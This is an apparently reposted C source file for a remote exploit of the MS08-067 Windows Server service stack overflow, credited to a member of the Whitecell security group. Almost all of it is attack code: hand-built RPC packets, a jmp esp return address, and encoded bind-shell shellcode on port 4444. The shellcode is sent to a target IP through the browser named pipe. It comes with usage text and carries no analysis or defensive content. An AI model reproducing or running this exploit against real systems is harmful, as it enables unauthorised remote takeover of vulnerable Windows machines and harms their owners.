MS08-067 Remote Stack Overflow Vulnerability Exploit 's

# 鬼仔：编译好的 ms08067.rar

Author:  Polymorphours
Email:[email protected]
Homepage:http://www.whitecell.org
Date:    2008-10-28

#include "stdafx.h" #include <winsock2.h> #include <Rpc.h> #include <stdio.h> #include <stdlib.h>  #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") #pragma comment(lib, "ws2_32")  struct RPCBIND {  BYTE VerMaj;  BYTE VerMin;  BYTE PacketType;  BYTE PacketFlags;  DWORD DataRep;  WORD FragLength;  WORD AuthLength;  DWORD CallID;  WORD MaxXmitFrag;  WORD MaxRecvFrag;  DWORD AssocGroup;  BYTE NumCtxItems;  WORD ContextID;  WORD NumTransItems;  GUID InterfaceUUID;  WORD InterfaceVerMaj;  WORD InterfaceVerMin;  GUID TransferSyntax;  DWORD SyntaxVer; };  struct RPCFUNC {  BYTE VerMaj;  BYTE VerMin;  BYTE PacketType;  BYTE PacketFlags;  DWORD DataRep;  WORD FragLength;  WORD AuthLength;  DWORD CallID;  DWORD AllocHint;  WORD ContextID;  WORD Opnum; };  BYTE PRPC[0x48] = { 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};  BYTE EXPLOIT[] = "/x05/x00" "/x00/x03/x10/x00/x00/x00/xA4/x00/x00/x00/x01/x00/x00/x00/x94/x00" "/x00/x00/x00/x00/x1f/x00" "/x00/x00/x00/x00" "/x2F/x00/x00/x00/x00/x00/x00/x00/x2F/x00/x00/x00"  "/x5c/x00" "/x41/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00"  "/x41/x41"  "/x41/x41/x41/x41" "/x41/x41/x41/x41" "/x41/x41/x41/x41" "/x41/x41/x41/x41"  "/x12/x45/xfa/x7f" // jmp esp "/x90/x8B/xF4/x81" "/x3E/x90/x90/x90/x90/x74/x04/x4E/x4E/xEB/xF4/x33/xC9/x33/xDB/xB1" "/x01/xC1/xE1/x09/x8B/xFC/x4B/xC1/xE3/x0D/x23/xFB/x57/xF3/xA4/x5F" // "/xB1/x01/xC1/xE1/x09/x2B/xE1/xFF/xE7/x41/x41/x41/x41/x41/x41/x41"  "/x83/xEC/x70/x90/x90/x90/x90/xFF/xE7/x41/x41/x41/x41/x41/x41/x41"  "/x00/x00/x00/x00/x01/x00" "/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00/x5C/x00" "/x00/x00" "/x01/x00/x00/x00/x01/x00/x00/x00";  BYTE POP[] =//stub header RPCFUNC structure "/x05/x00" "/x00/x03/x10/x00/x00/x00/xE4/x01/x00/x00/x01/x00/x00/x00/xD4/x01" "/x00/x00/x00/x00/x1f/x00" "/x00/x00/x00/x00" "/xCF/x00/x00/x00/x00/x00/x00/x00/xCF/x00/x00/x00"  "/x5c/x00" "/x41/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00/x2e/x00/x2e/x00/x5c/x00"  "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x90/x90" "/x90/x90/x90/x90" "/x90/x90/x90/x90" "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"  "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41" "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41/xCC/x41"  "/x00/x00/x00/x00/x01/x00" "/x00/x00/x02/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00/x5C/x00" "/x00/x00" "/x01/x00/x00/x00/x01/x00/x00/x00";  unsigned char bind_shellcode[] = // "/xCC" // "/x83/xEC/x40" // sub esp, 0x70 "/x29/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xad" "/x07/xe6/x4a/x83/xeb/xfc/xe2/xf4/x51/x6d/x0d/x07/x45/xfe/x19/xb5" "/x52/x67/x6d/x26/x89/x23/x6d/x0f/x91/x8c/x9a/x4f/xd5/x06/x09/xc1" "/xe2/x1f/x6d/x15/x8d/x06/x0d/x03/x26/x33/x6d/x4b/x43/x36/x26/xd3" "/x01/x83/x26/x3e/xaa/xc6/x2c/x47/xac/xc5/x0d/xbe/x96/x53/xc2/x62" "/xd8/xe2/x6d/x15/x89/x06/x0d/x2c/x26/x0b/xad/xc1/xf2/x1b/xe7/xa1" "/xae/x2b/x6d/xc3/xc1/x23/xfa/x2b/x6e/x36/x3d/x2e/x26/x44/xd6/xc1" "/xed/x0b/x6d/x3a/xb1/xaa/x6d/x0a/xa5/x59/x8e/xc4/xe3/x09/x0a/x1a" "/x52/xd1/x80/x19/xcb/x6f/xd5/x78/xc5/x70/x95/x78/xf2/x53/x19/x9a" "/xc5/xcc/x0b/xb6/x96/x57/x19/x9c/xf2/x8e/x03/x2c/x2c/xea/xee/x48" "/xf8/x6d/xe4/xb5/x7d/x6f/x3f/x43/x58/xaa/xb1/xb5/x7b/x54/xb5/x19" "/xfe/x54/xa5/x19/xee/x54/x19/x9a/xcb/x6f/xf7/x16/xcb/x54/x6f/xab" "/x38/x6f/x42/x50/xdd/xc0/xb1/xb5/x7b/x6d/xf6/x1b/xf8/xf8/x36/x22" "/x09/xaa/xc8/xa3/xfa/xf8/x30/x19/xf8/xf8/x36/x22/x48/x4e/x60/x03" "/xfa/xf8/x30/x1a/xf9/x53/xb3/xb5/x7d/x94/x8e/xad/xd4/xc1/x9f/x1d" "/x52/xd1/xb3/xb5/x7d/x61/x8c/x2e/xcb/x6f/x85/x27/x24/xe2/x8c/x1a" "/xf4/x2e/x2a/xc3/x4a/x6d/xa2/xc3/x4f/x36/x26/xb9/x07/xf9/xa4/x67" "/x53/x45/xca/xd9/x20/x7d/xde/xe1/x06/xac/x8e/x38/x53/xb4/xf0/xb5" "/xd8/x43/x19/x9c/xf6/x50/xb4/x1b/xfc/x56/x8c/x4b/xfc/x56/xb3/x1b" "/x52/xd7/x8e/xe7/x74/x02/x28/x19/x52/xd1/x8c/xb5/x52/x30/x19/x9a" "/x26/x50/x1a/xc9/x69/x63/x19/x9c/xff/xf8/x36/x22/x42/xc9/x06/x2a" "/xfe/xf8/x30/xb5/x7d/x07/xe6/x4a";  int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {  BYTE rbuf[0x1000]="";  DWORD dw=0;  struct RPCBIND RPCBind;   memcpy(&RPCBind,&PRPC,sizeof(RPCBind));  UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);  UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);  RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);  RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);  TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);   return 0; }  int main(int argc, char* argv[]) {  char *server;  NETRESOURCE nr;  char unc[MAX_PATH];  char szPipe[MAX_PATH];  HANDLE hFile;  WSADATA wsa;   int bwritten=0;  BYTE rbuf[0x100]="";  DWORD dw;  PVOID ptr = (PVOID)&POP;   printf( "/tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)/n/n" );  printf( "Create by Whitecell's [email protected] 2008/10/27/n" );  printf( "Thanks isno and PolyMeta/n" );  printf( "ShellCode Function: bindshell port:4444/n" );  printf( "usage:/n%s [IP]/n", argv[0] );   if ( argc != 2 ) {    return 0;  }   if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {    printf( "WSAStartup failed/n" );   return 0;  }   memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);   server=argv[1];  _snprintf(unc, sizeof(unc), "////%s//pipe", server);  unc[sizeof(unc)-1] = 0;  nr.dwType = RESOURCETYPE_ANY;  nr.lpLocalName = NULL;  nr.lpRemoteName = unc;  nr.lpProvider = NULL;   printf( "connect %s ipc$ .... ", server );   if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {    printf( "failed/n" );   return 0;  } else {    printf( "success!/n" );  }   _snprintf(szPipe, sizeof(szPipe),"////%s//pipe//browser",server);  printf( "open ////%s//pipe//browser ....", server );  hFile = CreateFile( szPipe,       GENERIC_READ|GENERIC_WRITE,       0,       NULL,       OPEN_EXISTING, 0, NULL);  if ( hFile == (HANDLE)-1 ) {    printf( "failed!/n" );   return 0;  } else {    printf( "success!/n" );  }   printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface/n" );  BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");   printf( "Send shellcode ..../n" );  TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);   printf( "Send Exploit ...... /n" );  TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);   CloseHandle( hFile );   return 0; }

WSS(Whitecell Security Systems)，一个非营利性民间技术组织，致力于各种系统安全技术的研究。坚持传统的hacker精神，追求技术的精纯。
WSS 主页：http://www.whitecell.org/
WSS 论坛：http://www.whitecell.org/forums/